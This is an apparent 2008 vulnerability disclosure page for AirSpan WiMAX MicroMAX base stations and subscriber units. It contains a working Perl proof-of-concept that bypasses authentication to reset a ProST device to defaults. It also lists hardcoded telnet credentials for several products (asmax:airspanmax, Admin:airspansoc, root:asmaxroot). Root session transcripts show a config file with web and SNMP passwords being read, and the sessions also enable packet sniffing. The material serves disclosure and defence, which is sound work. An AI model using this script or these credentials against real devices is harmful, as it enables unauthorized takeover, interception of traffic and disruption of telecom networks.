AirSpan WiMAX MicroMAX
vulnerabilities reports
  • ProST web access authentication bypass ( publication  date 8.03.2008)
    • A remote, unauthenticated attacker may be able to gain access to a vulnerable device and make arbitrary changes to its configuration.
    • #!/usr/bin/perl -w
    • ########################################
      #                                      #
      #  US-CERT VU#248372, example          #
      #  by Arthur Lashin
      diriger@gmail.com  #
      #                                      #
      ########################################
    •     use strict;
          use LWP::UserAgent;
    •     unless(defined$ARGV[0]) {
              die "\nUsage: $0 prost_ip\n\n";
          }
    •     my $ip = $ARGV[0];
    •     &prost_reset_to_default($ip);
    •     sub prost_reset_to_default {
              my $ip = shift;
              my $timeout = 20;
    •         my $html_body = undef;
    •         my $ua = LWP::UserAgent->new;
              $ua->timeout($timeout);
              my %form = ('DialogText' => 'to+reset+to+default', 'Advanced' => 16);
              my $response = $ua->post('http://' . $ip . '/process_adv/', \%form);
              if($response->is_success) {
                  $html_body = $response->content;
                  print $html_body;
              } else {
                  print "Connect to $ip failed: " . $response->status_line . "\n";
              }
    •         return $html_body;
          }
    • Vulnerability fixed 9.03.2008 in ss-6.5.40.71.z

Base Station Distribution Unit (BSDU) backdoor (publication date 18.03.2008)

  • AirSpan BSDU has a serious security hole, which allows anyone to get remote access to device with root privileges using undocumented telnet access that is on by default. This is possible because all BSDUs share the same root password:
  • [root@diriger]# telnet 192.168.1.254< xml="true" ns="urn:schemas-microsoft-com:office:office" prefix="o" namespace="">

    Trying 192.168.1.254...

    Connected to 192.168.1.254.

    Escape character is '^]'.

    bsdu-wimax login: root 

  • ~ # uname -ar

  • Linux bsdu-wimax 2.6.16.19-default #31 PREEMPT Wed Oct 10 18:45:13 IST 2007 ppc unknown

  • ~ #

    ~ # cd /root/shared/system

    /root/shared/system # ls -lF

    -rw-r--r--    1 root     root            4 Feb 26 08:17 activeBank

    -rw-r--r--    1 root     root          256 Feb 26 08:15 bank1metadata

    -rw-r--r--    1 root     root        27073 Feb 26 08:18 bank1verification

    -rw-r--r--    1 root     root          256 Sep  5  2007 bank2metadata

    -rw-r--r--    1 root     root        27073 Sep  6  2007 bank2verification

    -rw-r--r--    1 root     root          223 Mar 11 14:51 cfgsh.conf

    /root/shared/system #

     

    /root/shared/system # cat ./cfgsh.conf

    # WiMAX BSDU Configuration Shell config file

    ifconf static

    ip 192.168.1.254

    nmask 255.255.255.0

    gw 192.168.1.1

    ns 10.0.0.1

    sntps 10.0.0.2

    httplp < xml="true" ns="urn:schemas-microsoft-com:office:smarttags" prefix="st1" namespace="">admin,k5Rw2SDcTi

    snmproc w3E56G_0&

    snmprwc kY^$ds_*

    mvlan 15

     

    Here “k5Rw2SDcTi” is web access password. One can edit file  ./cfgsh.conf and reboot device to apply new settings.

  • ProST telnet access - asmax:airspanmax

Example:    

VxWorks login: asmax
Password: airspanmax

-> memShow
 status    bytes     blocks   avg block  max block
 ------ ---------- --------- ---------- ----------
current
   free     217876        56       3890     215928
  alloc    2611780      1807       1445          -
cumulative
  alloc  536676740   4823368        111          -
value = 0 = 0x0

-> plogStat
Plog status ( mask set 0x00000000,0x00000000 ) :
        < 0> ERROR                  [Off]
        < 1> WARN                   [Off]
        < 2> INFO                   [Off]
        < 3> CS                     [Off]
        < 4> ARM0_APPL_TASK         [Off]
        < 5> CNFG                   [Off]
        < 6> ExecLoop               [Off]
        < 7> MPA                    [Off]
        < 8> MPDU                   [Off]
        < 9> BRST                   [Off]
        <10> Framing (maps)         [Off]
        <11> DCD & UCD              [Off]
        <12> Connection             [Off]
        <13> Network Entry          [Off]
        <14> Ranging                [Off]
        <15> SBC                    [Off]
        <16> Link Maintenance       [Off]
        <17> Contention             [Off]
        <18> Link Manager           [Off]
        <19> LED ctrl               [Off]
        <20> Channel Reports        [Off]
        <21> IP Connectivity        [Off]
        <22> Registration           [Off]
        <23> Tx Scedular            [Off]
        <24> Management Msg         [Off]
        <25> MRCM                   [Off]
        <26> PKM                    [Off]
        <27> CRC & HCS Error        [Off]
        <28> RSSI & SNR             [Off]
        <29> BW Req & UL Alloc      [Off]
        <30> LED_PLUG               [Off]
        <31> DL Sync                [Off]
        <32> ARQ                    [Off]
        <33> ARQ RX                 [Off]
        <34> ARQ TX                 [Off]
        <35> WIFI Keep Alive        [Off]
        <36> DFS                    [Off]
        <37> FLASH                  [Off]
        <38> RF Drivers             [Off]
        <39> WEB                    [Off]
        <40> MIB                    [Off]
        <41> Home BS                [Off]
        <42> Misc                   [Off]
value = 4
3 = 0x2b = '+'
-> plogOn 28
value = 0 = 0x0

462053292 A1[\mrcm.c,716]FCH 15792087: RSSI -155[dBm/10] (-660 at ant), SNR 312[dB/10], TimeOff 0[Smpl], FreqOff -674[Hz]
462053302 A1[\mrcm.c,716]FCH 15792088: RSSI -155[dBm/10] (-660 at ant), SNR 311[dB/10], TimeOff 0[Smpl], FreqOff -709[Hz]
462053312 A1[\mrcm.c,716]FCH 15792089: RSSI -155[dBm/10] (-660 at ant), SNR 322[dB/10], TimeOff 0[Smpl], FreqOff -715[Hz]
462053322 A1[\mrcm.c,716]FCH 15792090: RSSI -155[dBm/10] (-660 at ant), SNR 317[dB/10], TimeOff 0[Smpl], FreqOff -1067[Hz]
-> plogOff 28
value = 0 =
0x0

/* tcpdump like commands, parameter = packet number */

-> sniffFromAir 5

... skipped ...

-> sniffFromEth 10
... skipped ...

-> NVM_ef_Set2Default   ### use this command to reset ProST to default ### 

  • MicroMAX BSR  telnet access - Admin:airspansoc

Example:

VxWorks login: Admin
Password: airspansoc

-> cmd "Start"
value = 0 = 0x0
-> tShell task deleted
No entry for terminal type "dumb";
using dumb terminal settings.
bs>: help

... skipped ...

bs>: VLAN::showGlobalConfiguration
Global Vlan Bridge Information
==============================
  Bridge Mode
    Bridge Mode             : Vlan Bridge
  Reserved Vlans
    Reserved Vlan (1)       : 4090
    Reserved Vlan (2)       : 4091
    Reserved Vlan (3)       : 4092
  Management Vlan
    Management Vlan         : 160
  Q-in-Q Configuration
    Q-in-Q mode             : disabled
    S-Tag Ether Type        : 0x9100
    S-Tag Pvid              : 0
    S-Tag Priority          : 0
    S-Tag config mode       : by SS
    S-Tag use priority from : C-Tag(inner)

bs>: showsniffer
SNIFFER
=======
    state : disabled
    no rules

bs>: createsnifferfilter direction=rx mac-filter=+112233445566 type=mac

bs>: createsnifferfilter direction=rx type=data

bs>: showsniffer
SNIFFER
=======
    state : disabled
  RULE id=14
    rx sniffed   : YES
    tx sniffed   : NO
    data sniffed : YES
    error  type  : ONLY VALID
    mac  sniffed : NO

bs>: enablesniffer
Packet sniffing enabled

  INFO
    point                    : RTM
    date                     : 1528.350 s -
  PACKET DESCRIPTOR
    Descriptor address       : 0x0e808344
    Actions                  : 0x00000000
    DL pointer               : 0x0ca2a420
    Rx errors                : 0x00000000
    Encryption               : no
    KSN                      : 0
    Packet type              : 0x00000046
      Raw                    : no
      Wimax                  : yes
      Ethernet               : Basic Dix
      VLAN                   : no
      IP                     : IP v4
      L4                     : no
    BWR / GSH value          : 0
    PHSi                     : No
    CID                      : 0x00000202
    Length                   : 60
    Stuffing                 : 0
    Burst/Stat number        : 162
    Mac message type         : 0x00000000
    802.16 infos             : 0x00000010
    Dest Address             : 0x00000015622ef3f0
    Dest Hash                : 0x00001238
    Src Address              : 0x000000a00ac49b32
    Src Hash                 : 0x00009c62
    Ip header address        : 0x0cfd45dc
    Valid bit (not accurate) : Sw
  DATA LINK
    Link address             : 0x0e808384
    Next link                : 0x00000000
    Buffer @                 : 0x0cfd45c0
    Type                     : 128
    Offset                   : 14
    Payload len              : 60
    Buffer len               : 1610
    Payload address          : 0x0cfd45c0
  PAYLOAD
    F3 F0 00 A0  0A C4 9B 32  81 00 00 10  08 00 45 00
    00 20 00 F0  00 00 40 01  2C 6E C0 A8  81 D5 0A 01
    01 01 00 00  D3 03 C4 07  13 56 7D AD  D7 F0 00 00
    00 00 00 00  00 00 00 00  00 00 00 00
  INFO
    point                    : RTM
    date                     : 1531.130 s -
  PACKET DESCRIPTOR
    Descriptor address       : 0x0e8089b8
    Actions                  : 0x00000000
    DL pointer               : 0x0ca2a420
    Rx errors                : 0x00000000
    Encryption               : no
    KSN                      : 0
    Packet type              : 0x00000026
      Raw                    : no
      Wimax                  : yes
      Ethernet               : Basic Dix
      VLAN                   : yes
      IP                     : No
      L4                     : no
    BWR / GSH value          : 0
    PHSi                     : No
    CID                      : 0x00000204
    Length                   : 64
    Stuffing                 : 0
    Burst/Stat number        : 210
    Mac message type         : 0x00000000
    802.16 infos             : 0x00000010
    Dest Address             : 0x00000015622ef3f0
    Dest Hash                : 0x00001238
    Src Address              : 0x000000235e216f3a
    Src Hash                 : 0x00009701
    Ip header address        : 0x00000000
    Valid bit (not accurate) : Sw
  DATA LINK
    Link address             : 0x0e8089f8
    Next link                : 0x00000000
    Buffer @                 : 0x0d001740
    Type                     : 128
    Offset                   : 14
    Payload len              : 64
    Buffer len               : 1610
    Payload address          : 0x0d001740
  PAYLOAD
    00 15 62 2E  F3 F0 00 23  5E 21 6F 3A  81 00 00 1F
    08 06 00 01  08 00 06 04  00 02 00 23  5E 21 6F 3A
    0A 1E 03 86  00 15 62 2E  F3 F0 0A 1E  03 85 00 00
    00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00
disablesniffer
Packet sniffing disabled

  • MaxroMAX BSR  telnet access - root:asmaxroot